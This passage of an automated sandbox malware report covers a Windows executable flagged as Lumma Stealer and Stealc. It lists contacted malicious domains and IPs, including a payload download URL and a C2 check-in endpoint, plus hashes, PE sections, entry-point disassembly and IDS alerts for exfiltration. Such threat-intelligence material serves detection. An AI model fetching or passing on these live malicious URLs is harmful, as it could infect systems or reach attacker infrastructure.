https://cook-rain.sbs/on	file.exe, 00000002.00000003.1484843360.0000000005461000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1443791649.0000000005470000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449469367.0000000005470000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/zwn35	file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/qd#3	file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/off/def.exe	file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569673630.00000000007D2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206	file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cook-rain.sbs/D(	file.exe, 00000002.00000002.1635250870.000000000547A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569277851.0000000005474000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569493664.0000000005476000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532217944.0000000005480000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	cook-rain.sbs	European Union	13335	CLOUDFLARENETUS	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1558835
Start date and time:	2024-11-19 21:01:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
15:02:18	API Interceptor	9x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
	View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htm	Get hash	malicious	Unknown	Browse	f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse	paste.ee/d/YU1NN
	TT copy.exe	Get hash	malicious	FormBook	Browse	www.lnnn.fun/u5w9/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/iiEh1iM3/download
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/dc8Ru
185.215.113.206	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/c4becf79229cb002.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206/c4becf79229cb002.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/c4becf79229cb002.php
	file.exe	Get hash	malicious	LummaC, Amadey, Stealc, Vidar	Browse	185.215.113.206/c4becf79229cb002.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, Stealc, Vidar	Browse	185.215.113.206/c4becf79229cb002.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206/c4becf79229cb002.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	185.215.113.206/
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/c4becf79229cb002.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206/c4becf79229cb002.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/c4becf79229cb002.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cook-rain.sbs	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://form.jotform.com/243186396374063	Get hash	malicious	HTMLPhisher	Browse	104.22.72.81
	https://form.jotform.com/243186396374063	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	Customer forms.pdf	Get hash	malicious	Unknown	Browse	104.17.223.152
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://online-e.net/st-manager/click/track?id=795&type=raw&url=https://msc-mu.com/apikey-tyudqnhzdgevhdbasx/secure-redirect%23Darth.Vader%2BDeathStar.com&source_url=https%3A%2F%2Fonline-e.net%2Feven-if-even-though%2F&source_title=Even%20if%E3%81%A8Even%20though	Get hash	malicious	Unknown	Browse	104.17.25.14
	xaSPJNbl.ps1	Get hash	malicious	LummaC	Browse	172.67.75.40
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	http://user.ecomab.cc	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://trimmer.to:443/GWHMY	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Your_Bonus_Breakdown_2024.docx	Get hash	malicious	Unknown	Browse	188.114.97.3
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	xaSPJNbl.ps1	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	EIR5pTRn9R.exe	Get hash	malicious	DragonForce	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.948388664259609
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'814'016 bytes
MD5:	e26ad37f58eaf809521e5050bebf9be4
SHA1:	b3468cf198d25f6453d40c65274082eec17a3572
SHA256:	e6ad1d53d8a2ecdbf77d597454b0260965b357693c0e525c0ffc81b283f4c7a6
SHA512:	9537de4e1d98c2af93ff81db3a09c21aa0769ebda86b6b905b6275e84f341492d223ad8a74820dd55b9511ccae5c2404a3dd0ec48a94552174b61c5381528791
SSDEEP:	49152:2aOr7HzbqRofF6Ty5vGiIpgOqSdMmX43pGJEf5VX:2Z7PKTy5ehprqSdlX4kyBVX
TLSH:	C985331D5F508731DEA65E392A135A23FC98E702278DFB145A363B3E6C6B23C75250B1
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....r;g..............................G...........@...........................H...........@.................................\p..p..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x87d000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x673B72E6 [Mon Nov 18 17:01:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F6268B4D41Ah
jl 00007F6268B4D431h
add byte ptr [eax], al
jmp 00007F6268B4F415h
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+00000080h], dh
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5705c	0x70	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x571f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x55000	0x25e00	86863753c2f80c509b4fd521b36ac122	False	0.9973893873762376	data	7.972498189955862	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x56000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x57000	0x1000	0x200	b32b7c4ad821f82288405a0d11e75f2f	False	0.15625	data	1.1076713340399604	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x58000	0x292000	0x200	99a760232aac3a90e23b6d74909d7be4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cizbpulm	0x2ea000	0x192000	0x191400	35829d5157f314c85a995d3521df4a2a	False	0.994610956970405	data	7.953165385789899	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
joqsldst	0x47c000	0x1000	0x600	2bb8028aca82d35ace61bc52b78219d3	False	0.611328125	data	5.240602332202131	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x47d000	0x3000	0x2200	ce7765b09c70a346ced5483445f84950	False	0.08467371323529412	DOS executable (COM)	1.2351137576422262	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-19T21:02:17.590625+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49708	188.114.97.3	443	TCP
2024-11-19T21:02:18.955093+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49708	188.114.97.3	443	TCP
2024-11-19T21:02:18.955093+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49708	188.114.97.3	443	TCP
2024-11-19T21:02:20.489097+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49725	188.114.97.3	443	TCP
2024-11-19T21:02:20.913004+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49725	188.114.97.3	443	TCP
2024-11-19T21:02:20.913004+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49725	188.114.97.3	443	TCP
2024-11-19T21:02:21.706827+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49735	188.114.97.3	443	TCP
2024-11-19T21:02:23.190951+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49735	188.114.97.3	443	TCP
2024-11-19T21:02:24.224595+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49750	188.114.97.3	443	TCP
2024-11-19T21:02:25.602868+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49761	188.114.97.3	443	TCP
2024-11-19T21:02:28.212544+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49778	188.114.97.3	443	TCP
2024-11-19T21:02:31.747289+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49802	188.114.97.3	443	TCP
2024-11-19T21:02:36.459981+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49832	188.114.97.3	443	TCP
2024-11-19T21:02:36.863927+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49832	188.114.97.3	443	TCP
2024-11-19T21:02:37.038978+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.7	49839	185.215.113.16	80	TCP
2024-11-19T21:02:43.772903+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.7	49876	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2024 21:02:17.078032970 CET	49708	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:17.078074932 CET	443	49708	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:17.078183889 CET	49708	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:17.104078054 CET	49708	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:17.104105949 CET	443	49708	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:17.590543032 CET	443	49708	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:17.590625048 CET	49708	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:17.593780041 CET	49708	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:17.593807936 CET	443	49708	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:17.594155073 CET	443	49708	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:17.635328054 CET	49708	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:17.681854963 CET	49708	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:17.681996107 CET	49708	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:17.682126999 CET	443	49708	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:18.955101967 CET	443	49708	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:18.955194950 CET	443	49708	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:18.955265999 CET	49708	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:19.053925037 CET	49708	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:19.053966045 CET	443	49708	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:19.053992033 CET	49708	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:19.054008007 CET	443	49708	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.016223907 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:20.016262054 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.016578913 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:20.017115116 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:20.017129898 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.488995075 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.489097118 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:20.490950108 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:20.490959883 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.491772890 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.493237972 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:20.493266106 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:20.493412018 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.913048983 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.913098097 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.913125038 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.913157940 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.913177013 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:20.913197994 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.913228035 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:20.913294077 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.913336992 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:20.913343906 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.913372993 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.913567066 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:20.913573027 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.918031931 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.918076038 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.918157101 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:20.918164968 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:20.918230057 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:21.001576900 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:21.001660109 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:21.001758099 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:21.001801968 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:21.001852036 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:21.002063990 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:21.002080917 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:21.002093077 CET	49725	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:21.002098083 CET	443	49725	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:21.225444078 CET	49735	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:21.225482941 CET	443	49735	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:21.225593090 CET	49735	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:21.225946903 CET	49735	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:21.225958109 CET	443	49735	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:21.706688881 CET	443	49735	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:21.706826925 CET	49735	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:21.708300114 CET	49735	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:21.708308935 CET	443	49735	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:21.708585024 CET	443	49735	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:21.709964037 CET	49735	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:21.710135937 CET	49735	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:21.710175037 CET	443	49735	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:23.190947056 CET	443	49735	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:23.191055059 CET	443	49735	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:23.191111088 CET	49735	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:23.246612072 CET	49735	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:23.246627092 CET	443	49735	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:23.746306896 CET	49750	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:23.746409893 CET	443	49750	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:23.746507883 CET	49750	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:23.747224092 CET	49750	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:23.747252941 CET	443	49750	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:24.224456072 CET	443	49750	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:24.224595070 CET	49750	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:24.226016998 CET	49750	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:24.226044893 CET	443	49750	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:24.226365089 CET	443	49750	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:24.227730036 CET	49750	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:24.227907896 CET	49750	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:24.227951050 CET	443	49750	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:24.228012085 CET	49750	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:24.228024960 CET	443	49750	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:24.906151056 CET	443	49750	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:24.906411886 CET	443	49750	188.114.97.3	192.168.2.7
Nov 19, 2024 21:02:24.906516075 CET	49750	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:24.906596899 CET	49750	443	192.168.2.7	188.114.97.3
Nov 19, 2024 21:02:24.906644106 CET	443	49750	188.114.97.3	192.168.2.7
